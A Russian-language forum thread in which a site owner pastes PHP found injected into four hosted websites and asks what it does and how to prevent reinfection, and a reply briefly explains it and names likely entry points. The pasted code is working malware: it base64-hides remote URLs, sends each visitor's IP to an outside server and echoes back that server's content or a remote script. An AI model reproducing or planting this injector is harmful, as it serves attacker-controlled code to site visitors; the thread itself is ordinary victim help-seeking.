Всем привет! есть хостинг на nic.ru, там четыре сайта. недавно обнаружил, что сайты не отображаются. залез в код и в каждом вот такая хрень: Код (Text): function sql2_safe($in) { $rtn = base64_decode($in); return $rtn; } function collectnewss() { if (!isset($_COOKIE["iJijkdaMnerys"])) { $value = 'yadeor'; $ip = $_SERVER['REMOTE_ADDR']; $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip; $file = @fopen ($get, "r"); $content = @fread($file, 1000); @setcookie("iJijkdaMnerys", $value, time()+3600*24); if (!$content) echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9uZXdkb21tZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4="); else echo $content; } } collectnewss (); Подскажите, что данный код делает? (контент парсит?) И еще, как злодеи доступ получили и как не повторить ситуацию?
Тут попытка загрузить код с порноресурса. Если не получается, добавляет скриптом iframe, в который тоже пытается загрузить что-то уже с другого сервера. Не стал идти по адресам и смотреть, что именно загружается и что делает функция collectnewss(), ясно, что код вредоносный. Много способов. Нужно искать лазейку. Это может быть слабый пароль админки или ftp. Может быть форма обратной связи с уязвимостью, и движок сайта не очищает GET и POST запросы.